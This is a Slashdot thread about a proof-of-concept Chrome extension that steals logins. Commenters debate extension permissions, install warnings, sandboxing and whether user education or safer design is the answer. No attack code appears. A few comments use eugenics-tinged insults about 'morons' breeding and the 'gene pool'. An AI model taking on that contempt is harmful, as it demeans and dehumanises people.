Google Chrome Extension Steals Login Details

An anonymous reader sends word of a proof-of-concept Google Chrome browser extension that steals users' login details. The developer, Andreas Grech, says that he is trying to raise awareness about security among end users, and therefore chose Chrome as a test-bed because of its reputation as the safest browser. Grech says he does not doubt that Chrome is a safe browser, but the point is that such an extension could be written for any of them. Grech says he has not uploaded his extension to the Google Chrome repository or anywhere else; but he has published enough details to allow others to reproduce the technique easily.

How is this different

[yoyhed]

How is this different than just downloading and installing a program? Chrome (and Firefox for that matter) give you a warning about trusting the source before installing an extension. Does it surprise anyone that allowing malicious code to run on their computer can expose their information?

Re:How is this different

[Ziekheid]

True. Nuff said.

Re:How is this different

[binkzz]

You are correct, and this "news" article is hardly shocking or news. But I do agree that plugins have too many permissions.for all sites that you browse, and that security could be a lot tighter.

Re:How is this different

Some check boxes showing which permissions the plugin wants, and which permissions you will give it, would be nice, easy, and effective at preventing something titled as a "bookmark enhancer" from stealing your passwords

Re:How is this different

[Jurily]

Does a tight Noscript setup block the attempts of malicious plugins to communicate with malicious sites?

Re:How is this different

[Tom]

Does it surprise anyone

Yes, anyone who is not a geek.

Look, to us tech people, these things are obvious. But everyone else out there doesn't have a clue. You have to design the car so that the user doesn't get the idea of looking into the fuel tank with a lighter, or if he does get that idea, that he can't do it. No matter how silly it sounds. This is why our society works, because we can safely use tools without having to be experts in them.

Re:How is this different

[m0interactive]

I laughed how a tech blog stated it as a "flaw" how could this be a flaw? It is a feature, extension developers can inject content scripts to any websites. And yes, that extension script can listen to keystrokes, and other events. That is part of the extension API. Unfortunetly many users don't understand the risk of installing third party app, but as Yoyhed stated, they give you a warning which is clear about that risk.

Re:How is this different

Definitely not. Noscript only prevents scripts running on web pages.

Re:How is this different

[rumith]

Yes, but this crap is reported on Slashdot, which is advertised to deliver news for nerds, not plumbers! Hell, this guy didn't even try to upload his exploit to the official extension repository because, as he claims, he "didn't want to exploit the vulnerability and harm end users".
Remember when Google pulled a vulnerability exploit proof of concept app from the Android Market, and purged it from end-user phones? That was a security research project. And this is just an A-grade crap.

Re:How is this different

[yoyhed]

What I meant by "does it surprise anyone" is "this is sensationalist BS to the Slashdot crowd". You're correct, but you're also missing my point - that this is about the same as downloading and installing any program, as far as the actions a user has to take to do so.

Clueless people can go install LimeWire just as easily as they can install a bad extension for Chrome. Hell, look at how easy it is to download and install something from IE - try the installer at http://www.google.com/chrome in IE8. It's a single click to get the installer running, and subsequently downloading and installing Chrome on its own. Chrome actually has as much security/warning for an extension as IE8 has for any software download coded like Google's installer!

Re:How is this different

[hitmark]

sad thing is, most non-geeks will not read this unless it happens to land on some front page in scare-types.

and even then they will likely not see the simple solution (be smarter when you browse) and instead hit the government "protect me!" button over and over like a caffeinated squirrel.

Re:How is this different

[yeshuawatso]

You have to design the car so that the user doesn't get the idea of looking into the fuel tank with a lighter

Or, you could educate the user that fire and gasoline don't mix. They don't need to know the chemical reaction side of it, but simply informing them that these two things don't mix shouldn't be too difficult. (I know you were being extreme to prove a point, so was I).

  I find it ridiculous to continually dumb down products. To me, this seems like it will cause a slippery slope to stupidity. What happens if we dumb down the products to the point where people don't know how to create them anymore, or the knowledge is only in the hands of the far and few? I resist the notion that learning should be back-seated for short-term profits. In the long run, people will become too stupid to buy those products and we're stuck with even dumber products.

Case in point, I know what a chainsaw is; I know what it does. I also know that a chainsaw is a dangerous tool. Because of the danger, the risk involved, and my lack of knowledge on proper use, I'm not going to buy a chainsaw, crank it up, and yell timber because the manufacture replaced the pull cord with a button. I will hire someone who knows HOW to use the tool, and to teach me HOW to use the tool before I venture on my own.

Dumbing down products isn't the answer, proper education is the answer, and there's a difference between making things easier, and making them idiot proof.

Re:How is this different

[snl2587]

I find it ridiculous to continually dumb down products. To me, this seems like it will cause a slippery slope to stupidity. What happens if we dumb down the products to the point where people don't know how to create them anymore, or the knowledge is only in the hands of the far and few? I resist the notion that learning should be back-seated for short-term profits. In the long run, people will become too stupid to buy those products and we're stuck with even dumber products.

Funny thing: how many people do you know in regular society that can put together a lightbulb? How about a microwave? What about the latest iPhone?

Re:How is this different

Hell, look at how easy it is to download and install something from IE - try the installer at http://www.google.com/chrome [google.com] in IE8. It's a single click to get the installer running, and subsequently downloading and installing Chrome on its own.

Firefox and Safari both have methods to initiate installs for setup executables from websites. Chrome is the only browser that does not.

Chrome's inability to perform this (Chrome's developers are publicly against it) is a weakness to be counted against it, IMO. One of the main reasons for the advancement of web apps is the difficulty in getting users to manually download and install executables. It should be a one-click, highly-warned action that only works for signed programs. It should not be a dozen-click operation of hide-and-go-seek.

Re:How is this different

How is this different than just downloading and installing a program?

It was different for ActiveX, wasn't it? Holy bias, Slashdot.

Re:How is this different

Or, you could educate the user that fire and gasoline don't mix. They don't need to know the chemical reaction side of it, but simply informing them that these two things don't mix shouldn't be too difficult. (I know you were being extreme to prove a point, so was I).

And when you tell them that simple repetition, they don't realize that fuel can be ignited by a random spark, or a nearby lighter, or even "harmless" static electricity. The problem is, even your approach is ultimately a dangerous simplification.

Re:How is this different

Wrong analogy.

It's more closer to your average Joe picking up strangers when driving their cars.

Sometimes you get the chance to screw your pick-ups, while at times you risk yourself getting screwed.

Re:How is this different

[n0-0p]

NoScript does nothing whatsoever to restrict extensions or plugins. Nor would it even possible for it to do so without a major redesign of Firefox's extension system including the introduction of a security model with trust levels.

Re:How is this different

[n0-0p]

Chrome already lists the permissions an extension requests at installation. The UI on that interaction is junk, so you need to be a fairly knowledgeable user to make heads or tails of it, but the information is definitely there.

Re:How is this different

[Tom]

Or, you could educate the user that fire and gasoline don't mix.

Yes, and to only walk on green, and to install antivirus, and to have safe sex, insurance, not go into certain parts of town, keep the car in working condition, verify their patch level is current, check all money for forgery is easy as well, and two million other things.

There is only so much that a human brain can actually act on. Storage is not the problem, recall is. Sometimes, the right decision is to educate people, but it is not a panacea. If it is easier to simply design in a safety than to educate everyone and keep them educated, then building in the safety is the proper thing to do.

Also, often these things go hand in hand. I still don't understand why current operating systems don't indicate the priviledge level an application is running at by, say, a coloured border. You'd still need to educate people on what it means, but a fairly simple safety gives them a lot more options than the stupid "well, you could open a console and run ps" geek solution.

What happens if we dumb down the products to the point where people don't know how to create them anymore, or the knowledge is only in the hands of the far and few?

That's a philosophy that has never worked in all of human history. Sorry to say that. We always start out with new technology that only a few understand, be it fire, mathematics, science, cars or computers. At first, you need to be an expert just to use it. But then the rest of humanity wants a piece of the cake, too. That's when we "dumb down" the technology. Actually, it is not dumb at all, it is making it useable. I've written Linux kernel modules, and still I enjoy a good user interface design, because it makes my work easier, and more often than not I use the computer to actually accomplish something, not to mess with its interiors.

I don't see a dictatorship anywhere just because we have put fire into light bulbs instead of torches, and give people lighters instead of teaching them how to use flintstone.

Really, if you want to tinker with something, why not flat out say that you enjoy the tinkering? Why try to make it political?

Re:How is this different

[yoyhed]

I agree with your sentiments. However, note that in IE it does NOT warn you at all - that's not good. There should be one warning.

However, that's beside my point. I was just demonstrating that Chrome has plenty of warning for installing an extension, and that people should not get their panties in a bunch because *gasp* users ignoring a warning about downloading and installing software from third parties can lead to malicious code execution.

Re:How is this different

[Spyware23]

Does it surprise anyone

Yes, anyone who is not a geek.

Look, to us tech people, these things are obvious.

Please, most people (>90%) posting on Slashdot are perfectly ignorant of how security works. Don't toot your/our horn too much.

Re:How is this different

Funny you should mention NoScript, since that's a plugin that's already been involved in its own scandal. Not as bad as stealing login information but still a breach of the users' trust.

Re:How is this different

[yoyhed]

The problem with ActiveX was not the possibilities for malicious software, it was that it executed without warning until what, IE6 SP2? Even then there were ways around it if I remember correctly.

Chrome gives you a clear warning for installing extensions. Chrome also runs each process in its own sandbox, unlike the security nightmare that was IE back in the ActiveX glory days.

And of course I'm biased toward clearly better software (in this case, Chrome vs. IE).

Re:How is this different

"This is how our society works, we have to make tools that can be safely used because we're not experts in them."

Fixed.

(Your own examples explain why it needed to be fixed.)

Re:How is this different

I agree with your sentiments. However, note that in IE it does NOT warn you at all - that's not good. There should be one warning.

I think that Google's web installer is using the previously-installed Google Updater 'OneClick' plugin for IE. If it used ActiveX (which it did when GU was not installed) then there would be a very clear, visible warning with the name of the company ("Google, Inc.") at the top of the page.

Re:How is this different

[yoyhed]

I could have sworn that it behaves the same on a brand-new install of Windows 7 (and Chrome is usually the very first thing I install). However, I'm too lazy to test it on a VM so you may be right.

Re:How is this different

The easy test is to disable the Google Update Plugin within IE. After visiting the Chrome installer site again, I received this new notice:

http://i32.tinypic.com/sggyo2.png

Re:How is this different

NoScript does nothing whatsoever to restrict extensions or plugins.

*gasp* HERETIC!!! This is SLASHDOT, unbeliever! The almighty NoScript and its blessed son FlashBlock are the infallible answers to every single problem you have ever had or will ever have. REPENT! REPEEEEEEENT!!!

Re:How is this different

[Yvanhoe]

Because, obviously, the average user who apparently is not able to read a warning on his computer screen is likely to go look for information on security blogs...

Re:How is this different

[nacturation]

Maybe what the browsers need is some sort of vetted App Store for extensions, where all submissions are reviewed by a central authority and approved or rejected?

Re:How is this different

[yoyhed]

Good call. I should have thought of that. I suppose I remembered it as one click because I mindlessly click through stuff like that when I know what I'm doing.

My argument stands - Chrome gives you a warning for extension installation, so there's nothing to see here; unless it's suddenly news that installing third-party software and ignoring warnings about the possible consequences can lead to theft of information.

Re:How is this different

Like addons.mozilla.org?

Re:How is this different

[yeshuawatso]

I'm not trying to make this political, I'm just expressing my opinion (the only one I can give [yes, opinions are like...]).

But to answer some of your questions:

I still don't understand why current operating systems don't indicate the priviledge level an application is running at by, say, a coloured border. You'd still need to educate people on what it means, but a fairly simple safety gives them a lot more options than the stupid "well, you could open a console and run ps" geek solution.

This isn't dumbing the OS down, it's creating a different translations/interpretation. However, making all applications run at a root or guest level because informing the user about permissions is too difficult is dumbing down the software. This is one of the best features about Linux. If you're going into root, then you most likely know what you're doing. Otherwise, you stay at the user level and sudo your way down if needed. MS got this wrong until Windows 7. XP Home gave anyone admin run rights and Vista didn't give any.

I've written Linux kernel modules, and still I enjoy a good user interface design, because it makes my work easier, and more often than not I use the computer to actually accomplish something, not to mess with its interiors.

But this isn't dumbing the tech down, as you're probably still doing the same action, just in a different way. I can type up a business plan in VI all day long, or I can use a word processor with a more usable GUI to work faster. But I understand why I'm using the WP vs VI. The problem with our society today is we're dumbing our tech to match the ever lowering intellect. This isn't so much a problem in other parts of the world as it is here in the US.

I'm not talking about safety here, I'm talking about reducing our technology down to the point where the stupid are able to use it-- ONLY for the sake of profit. The motor vehicle is a marvelous technological breakthrough that reduced the time it took one to travel from one point to the other. However, it's also a moving death trap in the hands of the uneducated. Because it's so dangerous, every State in the US has a law that requires you to take an exam to ensure, to some degree, that you understand not only the rules of the road, but also how to operate the moving death box; only to reduce the chances of harming yourself and others. However, when we make the cars so that idiots receive less and less harm when in an accident, we have more and more wrecks. It's one of the reasons I admire roundabouts and traffic circles. Instead of providing traffic signals that people try to race with, ignoring the signs of a roundabout can be pretty unhealthy.

Now, don't equate that we need the government's blessing to use a browser and the internet, but I don't think we should shield the stupid who refuse to read the warning signs. I say keep doing what we're doing and at least keep a lot of /.'s with steady employment fixing Windows. Educate the ignorant, don't protect them.

Re:How is this different

[yeshuawatso]

Yeah, I should have been more clearer. I didn't mean that the society today can put together their tech and the future won't, but those putting the tech together will be forced to merge into the ignorance because we're making the tech easier for them to create/put together instead of teaching them the long way before the shortcut. Example: A JavaScript programmer gets so used to using jQuery or Prototype that they forget how to do the same task when they don't have access to those libraries. I've seen the same thing happen to high school students who are allowed to use calculators so much they forget how to do the math by hand and head. Realistically, this will probably never happen, but in the event that it does occur, our society might be in trouble if the brawns rid the brains.

Re:How is this different

[helix2301]

I agree this is not breaking news. We know malicious software can steal your information for any geek this is not anything new.

Re:How is this different

[scamper_22]

We, developers take it as a given that programs (and thus extensions) should be able to do anything. Arbitrary code if you will.
If you actually think about it, it's a little nuts. You download an application, and it could reformat your harddrive.

Truth be told, even we programmers simply rely on 'trust' that the various programs and extensions aren't doing anything evil.
I don't go through every line of source code. I trust the developers. I trust a popular program. But it really is just that... trust.

Now the OS does prevent somethings to enhance trust. There are file permissions for example.

Other web technologies have other security. Silverlight for example can open local files... but the user has to manually select it via the windows file dialog. You can't program in a file location.
They were smart enough to not just take the Active X approach were 'just because you visit this website and run the application, it can do anything'. They build limitations into the environment.

So what safeguards does a browser provide?
Well, password information is crucial. Quite frankly, any application that even attempts to access a password field should be blocked... unless the user explicitly understand this. And I don't mean some generic warning message that applies to every extensions.

And so the point is... extension are no different than downloading and installing a regular program... but they bloody well should be!

Re:How is this different

[BigDXLT]

The news has to be dispersed somewhere. It's a reminder that we can't just dump alternate browsers on our friends and expect them to stay 100% secure. I'm not saying it's worse than IE, but if some people are gullible enough to download that virus program, they're sucker enough to download malicious plugins too.

Re:How is this different

[Tom]

The problem with our society today is we're dumbing our tech to match the ever lowering intellect. This isn't so much a problem in other parts of the world as it is here in the US.

Ok, putting "don't dry hamsters in microwave oven" signs on every microwave is probably excessive. Then again, with a bit more of technology you could probably detect that there's a living being inside the oven and not turn it on. What is dumbing down, the sign or the automatic detection? I'm not arguing for the sign.

Now, don't equate that we need the government's blessing to use a browser and the internet, but I don't think we should shield the stupid who refuse to read the warning signs.

Why not? The example with the cars is only valid because it's a potentially deadly weapon to others. If you want to kill yourself because you didn't bother reading the instructions, by all means be my guest. It's endangering others where society gets interested, and governments become active.

Re:How is this different

[Runaway1956]

I might argue that you have cited the reason our society is most likely to fail. We protect morons from themselves, so that they can survive to breed. Society is selectively breeding more and more morons with each generation.

If the idiot wants to peer down his fuel tube with a match, LET HIM DO IT!! Don't stand in his way. Hell, let's facilitate the operation - move the gas tank into the trunk, and put a trap door on top of the tank, and put a box of matches right beside the trap door.

The gene pool really needs to be filtered.

Re:How is this different

Look, to us tech people, these things are obvious. But everyone else out there doesn't have a clue. You have to design the car so that the user doesn't get the idea of looking into the fuel tank with a lighter, or if he does get that idea, that he can't do it. No matter how silly it sounds. This is why our society works, because we can safely use tools without having to be experts in them.

No, no, no!!! NOOOOOOOO!!!! If computers become as easy and safe to use as a car, then all the geeks would lose their one single advantage in life!

No, computers must remain complicated and mystical, where without the guidance of the local geek, everyone would be lost! That way, geeks can ridicule people who got tricked by trojans and feel good about themselves.

Re:How is this different

But people manage to install lightbulbs by themselves most of the time, and they don't often cook forks and other things that could light the microwave on fire.

There is a point where people aren't in general able to assemble/build things without specialist knowledge. But knowing that "some programs could be bad" is not specialist knowledge. It should be along the lines of "Don't put water into your gas tank. Only gasoline" by now.

Re:How is this different

[TheLink]

If you're paranoid, run multiple browsers using different accounts (under a main user).

For example, you login as mainuser. Browser1 runs as wwwbrowser1, browser2 runs as wwwbrowser2.

You do your banking stuff with browser1 which has zero or only extensions you are sure you can trust. You do your normal browsing with browser 2.

You configure browser 2 to have a different skin (browser 1 has default skin), so that you can more easily tell the difference.

This way if browser 2 is pwned. It is lesss likely to have access to browser 1's stuff, or mainuser's stuff.

If browser 1 is pwned, despite you only using it for bank stuff, it's probably your bank's fault.

Not sure you can do this easily with Google Chrome. I had difficulty running google chrome as a different user on Windows. I can do it with Firefox and IE. You can control which users show up on the login screen with TweakUI.

Re:How is this different

[romania]

Firefox won't do a thing that is mildly original. They took the code base of some other browser, said they are going to make it smaller only to bring it to the same size the next version. Same goes for the features. Most OSS software goes the same way, the way of "hey, have you noticed that on that system they have this? cool, let's try to mimic it". So it's up to Safari, Chrome or Opera to implement something like this and Firefox will proudly label that as work in progress for the next major release.

Re:How is this different

[n0-0p]

I think you may have intended to reply to someone else. I was simply answering a question on NoScript's capabilities.

Also I'm quite familiar with running multiple profiles; my job would actually be impossible without it. In Chrome you simply pass the --user-data-dir switch. I don't see how that's any worse than running Firefox with the -P and -no-remote switches (or the old way requiring env vars). I am curious how you run IE under a separate profile without using a different Windows accounts. I didn't think that was possible, and instead use runas to get an alternate profile in IE.

Re:How is this different

Funny story, that's the Safari 5's extension store concept.

Re:How is this different

If the whole ActiveX fiasco taught us anything, its that users will click on anything if they thing that on the other side of the dialog box is something they want.

Re:How is this different

[yoyhed]

if some people are gullible enough to download that virus program, they're sucker enough to download malicious plugins too

And that's not the browser's fault in any way. You can't stop idiotic users from downloading malicious shit unless you stop them from downloading ANY program or plugin. They'll ignore every warning they see because they don't feel like reading.

Re:How is this different

[yoyhed]

If the whole ActiveX fiasco taught us anything, its that users will click on anything if they thing that on the other side of the dialog box is something they want.

Exactly - and this is why Chrome's not at fault for this whole extension thing, and why it's not even a problem. They give a warning, and ignorant people will ignore it.

Re:How is this different

[yoyhed]

That's a good point. AFAIK, Chrome does have some sort of listing of what permissions the extension is requesting at installation - however, it should probably have an extra warning for password stuff.

Ignorant people will probably skim over the initial warning because they see a bunch of stuff they don't understand (or more commonly because they DON'T EVEN BOTHER TRYING TO READ IT) - so the password warning would have to be as blunt as possible.

I can't believe how many people just don't even bother reading dialog boxes before calling me. The answer is right there, the program is telling them, and they won't read it because they assume they won't understand.

Re:How is this different

[TheLink]

You did mention "introduction of a security model with trust levels".

And I don't think it's going to be easy to do right while allowing many types of extensions - after all if there can be extensions that help manage passwords, it'll be possible to have extensions that can abuse them.

So IMO it is better to just run different browser instances as different user accounts as I suggested.

Running browser instances as the same user but different data directories does not protect you as much. Because if the browser is taken over, anything the user account can do, the "pwned" browser can do.

Google Chrome and "run as" doesn't work so well: http://code.google.com/p/chromium/issues/detail?id=31387

Re:How is this different

I agree this is hardly news; however, the statement that chrome has a reputation as the safest browser was very shocking. Mainly because its not and does not have that reputation.

Re:How is this different

[n0-0p]

You're conflating a few different things. There's origin security and there's local client security. Origin security is what protects you from one site accessing browser data from another site. Any discussion of extension permissions would apply primarily to origin security, because once you install anything with local client access you've already lost control. And when considering origin security, separate profiles within the same OS-level user account provide one method of strict enforcement.

Now, if your concern is client level security against exploits (not malicious extensions or plugins), then you're far better off relying on the Chrome sandbox over a separate user account. The sandbox provides vastly lower privilege and much smaller attack surface than a normal user token, and OS-level privilege escalation vulnerabilities are far more common than sandbox bypasses. You can certainly use your approach in conjunction with the --no-sandbox option in Chrome, which should allow Chrome to work with runas. However, you'd be downgrading your security with that approach.

The important thing to consider, however, is that no user should be expected to invest their own effort in a multiple profile solution. So, until someone creates something like the Chrome sandbox but with per-process origin isolation, there won't really be a general purpose solution providing a superior form of origin based security.

Re:How is this different

[Tom]

We protect morons from themselves, so that they can survive to breed.

That is true, and it irks me to no end. However, the real problem is not selection - most of the moronic things are not deadly. The real problem is that we encourage stupidity.

Just look at the idols of the day. Most of them are either dumb as shit, or at least pretend to be (I'm looking at you, Paris). Dumb is "cool". The whole football/soccer world cup has been a great example - otherwise smart people use it as an opportunity to become total idiot assholes for an evening, or several.

Selection does not only work by killing people off. It also works by encouraging positive traits. And in mental abilities, encouraging works better since they are at least partially (how much is still in debate) a matter of upbringing and training and not genetic.

The second problem is that the dumbfucks breed like rabbits, while the smart people get fewer kids, later in life. So what little selection you have is getting outpaced.

Re:How is this different

[TheLink]

Conflating or not, I prefer a more role/task based concept.

That way I can use one browser for lower security level stuff (whether visiting sites, or having more fancy plugins), and not have it affect my other browser which I use for higher security level stuff.

And I can do this without having to buy multiple computers.

If the browsers support sandboxing that's great. But whether they do or not does not affect my approach. I'd still be using multiple browsers, because it is just better "hygiene", and a more secure way of doing things. If say your banking site has weaknesses, it's harder for others to exploit that+you if you only use one browser for banking and only banking and it's not your default browser.

In contrast if you use the same browser for everything, your risk goes up - you might type in the wrong password to the wrong site; there might be a flaw in your banking site, and some ad banner could cause you to load the "wrong link".

If it is possible to run multiple distinct and separate instances of Chrome and keep sandboxing enabled AND the sandboxing applies to all externally exposed stuff (plugins etc), then I'd be happy to use it. Otherwise it would not be as secure.

Lastly from: http://www.chromium.org/developers/design-documents/sandbox
"Under Windows, there is no practical way to prevent code in the sandbox from calling a system service."

OK...

[The+MAZZTer]

He's just doing basic stuff here with that extension. When you try to install any extension Chrome throws up a warning that the extension can access your personal data on whatever sites the extension author has requested access to in the manifest.json file. Ignore that warning at your own peril, especially if it doesn't match with what the extension description says it should do.

Lots of extensions inject content scripts. Lots of extensions do random AJAX calls to random sites that the user doesn't have open in a tab. That he put the two together to steal data is hardly revolutionary.

The only problem I see is that if the author specifies enough websites in their extension permissions, Chrome truncates them to "multiple sites" which is a bit ambiguous.

Re:OK...

[DMUTPeregrine]

You have made the fatal mistake of assuming that users read warnings and dialogue boxes. They don't.

Standard abuse of trust. Is this /. worthy?

Guy learns to program, abuses trust of software users. Film at 11?

Evidence

[Z00L00K]

Evidence exists that browser plugins and extensions are providing a lot of leaks and possibilities for intrusions.

So avoid installation of unnecessary problems by not installing anything else than really necessary extensions for your browser activities. What browser manufacturers needs to consider is how to improve security related to extensions and plugins. One way is to make sure that the plugins and extensions run in isolated subprocesses with lowest necessary privileges.

Re:Evidence

[Khyber]

"Evidence exists that browser plugins and extensions are providing a lot of leaks and possibilities for intrusions."

*coughFLASHcoughJAVASCRIPTcoughACTIVEXcough*

tl;dr

tl;dr: When Chrome says an extension has access to your data on all sites, it means that extension has access to your data on all sites.

whoever wrote that was a barbaric fuck

[blai]

and proved nothing else

In other news ...

[gdshaw]

... a proof-of-concept Google Chrome browser extension that steal users' login details.

That's nothing. Wait till you see my research on what's possible when you get the user to install a malicious kernel module ...

Re:In other news ...

[Nemilar]

I get your point (that a kernel module, being low-level, gives you greater access), but I think a malicious browser extension is worse.

* It's a lot less likely that a user will install a malicious kernel module, as compared to a browser plugin.
* It's a lot easier for someone with bad intentions, a few hours, and a little coding experience to write a browser plugin, than it is for them to write a kernel module.
* It's much easier to distribute a plugin, and the install base is much greater.
* The signal/noise ratio of data you would want to steal is much more attractive for a browser plugin, than it would be inside the kernel.

Re:In other news ...

[hitmark]

and this is why i dont worry much about rootkits for home computers, as even access to just the users account will likely expose a whole lot of valuable data to whoever wants it. so if one want more security the valuable data should be accessed by way of an account that only do so, and have no real contact with the everyday user activity.

heck, was there not talk about a livecd specifically for banking?

Re:In other news ...

[gdshaw]

You're reading too much into my subtle sarcasm: I was merely suggesting that this is a highly unsurprising result. All that has been discovered here is a special case of the rule that your security is at risk if you download and execute malicious code.

Re:In other news ...

[hilather]

... a proof-of-concept Google Chrome browser extension that steal users' login details.

That's nothing. Wait till you see my research on what's possible when you get the user to install a malicious kernel module ...

I can't wait to see how long the instructions for installing your kernel module will be. Remember you have to /trick/ a regular user.

Re:In other news ...

[gdshaw]

OK, let me explain. The kernel module was what's known as a 'rhetorical device' intended to illustrate a point. The point was that writing a program do commit a dastardly deed, then executing it in a context where it has permission to commit that dastardly deed, is (a) not news, and (b) not even a security violation.

Re:In other news ...

What's interesting is the perception even on first FA's site that this is a security hole that should be patched by Google. They don't get that it's a trusted source type issue, though the coder does.

This sort of thing on /. isn't News For Nerds in the sense of technical revelation, it's NFN about how the world outside is perceiving things. Kinda a useful "heads up" about the kind of questions you're going to be getting next week from friends and family.

Super secret security advice...

[christoofar]

Is this different than someone deciding to run a bash script that wipes their hard drive, as root?

So you can install an extension that's bad. Like you can open an e-mail attachment that's bad. Like you can open a programmable document that has a bad macro.

Seriously, where's the security concern? Don't install crap extensions and you won't have your passwords stolen through crap extensions. Easy enough?

Sandbox?

[drolli]

how about a sandbox? How about stealing some Ideas from java? I think one can introduce a "Wants to read password" exception" or a "wants to transfer data outside" exception. And at least firefox points out to me that installing extensions requires thrusting the author

Re:Sandbox?

[christoofar]

I think you might also risk catching something if you're *thrusting* the author.

Re:Sandbox?

[symes]

For your average user, sometimes it is enough for a piece of software to come with a note saying that installing this app is absolutely essential. So the question is, do we harden the browser or do we harden the user? The latter is impossible, and thinking otherwise is potentially negligent. Seriously, people have tried suing burger chains because they got fat on burgers and chips. People have tried suing bar owners because they drank too much and crashed their car. The depths of stupidity know no limits. So the only realistic solution is some kind of sandbox. That or some sort of virtual eugenics programme where you have to pass tests in order to get online.

Re:Sandbox?

[selven]

The Chrome extensions system has the concept of permissions, where an extension must list the special permissions it needs in its manifest.json file. If the extension requires special permissions, the user is warned. If the extension tries to do something requiring permissions without asking for them, it fails. One comment in TFA says that the proof of concept extension given does require permissions. If that's true, then this is a nonstory, since it would be just as hard to get in by convincing the user to download an extension as it is to get in by convincing the user to download a program.

Re:Sandbox?

[icepick72]

Whooaaa buddy! ... you can imagine thrusting the author in a sandbox all you want but let's keep this discussion clean.

Re:Sandbox?

[n0-0p]

It's just sad that you find it perfectly acceptable to comment like this on an application you obviously know absolutely nothing about. Chrome actually does run extensions in a sandbox. It also warns on installation of an extension, and explains what permissions that extension requires. If an extensions attempts something require a privilege that wasn't in its installation manifest the operation fails. As I said in another comment, the UI has issues and could certainly be improved, but the fact is that Chrome currently does everything you just implied it fails at.

Re:Sandbox?

[drolli]

I may point out that the style of the article implied it fails at this.

Re:Sandbox?

[drolli]

Yes, i think its an nonstory.

However:

Me (to secretary): I can access the webpage without getting a warning about the certificate
Secretary: I cant access it without problems
I (sitting besides her) see that she takes 0.1 sec to click the warning away: Ahem, you just got the warning!
Secretary: yes, its always there.

(And this was an company-internal application where the fix was to download the certificate exactly from the same untrusted website - that educates the users well)

Maybe the permission for "reads password data" should not exist.

Re:Sandbox?

[n0-0p]

There isn't anything like "reads password data," nor could there be without drastic changes to the DOM standard and how JavaScript is implemented in modern browsers. The way the system works is that the installation manifest states what origins a content script will run in. And any script executing within an origin has access to all that origin's data. This is conveyed to the user with a message like "this extension can access data from site X.com" or "this extension can access data from all sites."

If you have a proposal for something better, then please share it. But the Chrome extension security model was well researched. And it was apparently considered good enough that Apple and Mozilla are creating similar models with Safari and JetPack.

Re:Sandbox?

[drolli]

Did you read the document you cite? Its says: "We focus on benign-but-buggy extensions"; this seems to not the case here.

Re:Sandbox?

[n0-0p]

Not only have I read the paper, I've worked with a few of the authors on this subject matter. And that's why I know that it's essentially impossible to provide a useful extension API that is not also vulnerable to intentional abuse. Claiming the opposite is akin to claiming you've refuted Gödel's first incompleteness theorem. And if you've succeeded at either, I'd like to see the evidence. (Just a heads-up, you're starting to line up a pretty tall list of things you'll need to accomplish to support your arguments here.)

Re:Sandbox?

how about a sandbox?

Chrome already does this. Chrome extensions run in their own sandboxed process, with minimal rights.

I think one can introduce a "Wants to read password" exception"

How would a program know what field is a password? What if the extension changes the page to put a new "password" field on top of the real one?

or a "wants to transfer data outside" exception.

Chrome already does this. Extensions can't send requests to a host unless they ask permission to talk to a host. If they request this permission, on install a warning shows the list and asks if the user wants to allow the extension to be installed.

And at least firefox points out to me that installing extensions requires thrusting the author

Chrome already does this, and goes a step further by listing exactly what the extension can do, based on the list of permissions the extension requests.

Re:Sandbox?

[drolli]

Before i claim the opposite, i would like to see your mathematical proof that a "useful" API can not protect against intentional abuse. (Citation?)

Re:Sandbox?

[n0-0p]

You have this backwards. I can point to every major browser, along with research directly addressing the topic. Whereas you haven't provided one iota of evidence to back up your misguided and ignorant statements.

Since it's obvious you have nothing of value to contribute, I'm just going to close this out with a suggestion. When confronted with a topic you obviously know nothing about, please resist the temptation to make noise just so people will notice you. It just wastes everyone's time and prevents you from actually learning anything.

Any plugin or extension is a privacy & sec ris

Any and every plugin for a browser is a security or the very least a privacy risk. You don't have to just look at Acrobat for so many security risks and flash for the enoumourous privacy risk. Atleast on my browser, I can't delete flash cookies using the GUI.

Atleast plugins/extensions can be disabled, but what about javascript? What about privacy leaks from JS?

Re:UGH! When are you going to learn??

Just look at how they appease the Chinese government to make a buck.

You mean like how they refuse to censor their search results?

"For now.,,"

[John+Hasler]

> For now, only install plugins from people you know and trust...

Um, "for now"?

Re:"For now.,,"

Well, "for now" there is not much possibilities aside from that. But in a "hopefully" near future, we'll get some easy to use and easy to set-up security for thingslike extensions and plugins, so we'll be able to ignore the "people you know and trust" part. Except for, you know, unexpected flaws in said security.

Re:"For now.,,"

[AnonymousClown]

Well, "for now" there is not much possibilities aside from that. But in a "hopefully" near future, we'll get some easy to use and easy to set-up security for thingslike extensions and plugins, so we'll be able to ignore the "people you know and trust" part. Except for, you know, unexpected flaws in said security.

How? If you're going to use, let's say, a password and userid manager, you pretty much have to accept that the plugin is going to be storing and accessing that shit. Unless Google develops an API that acts as a secure black box - developer uses an API for passwords and UIDs and any other private type of information so that he has no access, a user will have to accept some loss of security for convenience. Then there's the issue of auditing the plugins for compliance.

Re:UGH! When are you going to learn??

[countertrolling]

They ARE censoring their search results. And they are doing that everywhere, not just China. What makes you think they aren't? Because they say so? Please... stop

Erm, news?

[thePowerOfGrayskull]

So, he created a plugin that let him do what the plugin architecture is designed to allow him to do? I'm not sure how this is newsworthy...

Re:Erm, news?

[Jahava]

So, he created a plugin that let him do what the plugin architecture is designed to allow him to do? I'm not sure how this is newsworthy...

Yeah, combined with the Android rootkit it seems like Google has no concept of security.

These "security researchers" need to understand that there is neither respect nor prestige creating software that asks permissions to do something and then does it. They are merely pointing at various faces of a larger system flaw: that people who don't understand computers will not understand what any type of software can do to their computers. There really is no "best case" solution for this problem. Either choose a vendor who will lock you into their idea of secure, or go for an open market and be smart about it.

Other Slashdot threads are pointing out that people don't understand their browsers / phones / etc. can get viruses from third-party code. If it hasn't been drilled into people that anything you do on your computer can be a virus, and that they should only do things at respectful places, there's no saving them.

Re:Erm, news?

[thePowerOfGrayskull]

They are merely pointing at various faces of a larger system flaw: that people who don't understand computers will not understand what any type of software can do to their computers.

That's an excellent point, and one that most people miss. No matter how much security you lather onto a system (infrastructure and AV) or how difficult you make it to do mundane tasks (I'm looking at YOU uac and gksudo), it's fatally flawed if it has to be used by a person.

Re:UGH! When are you going to learn??

[insertwackynamehere]

[citation needed]

I really hate to do this but unless you can back that up, then please...stop

Re:UGH! When are you going to learn??

[countertrolling]

*sigh*

You mean my computer is a general purpose machine?

[calmofthestorm]

capable of running whatever code I instruct it to? Waah, I want big government/big business to protect me!

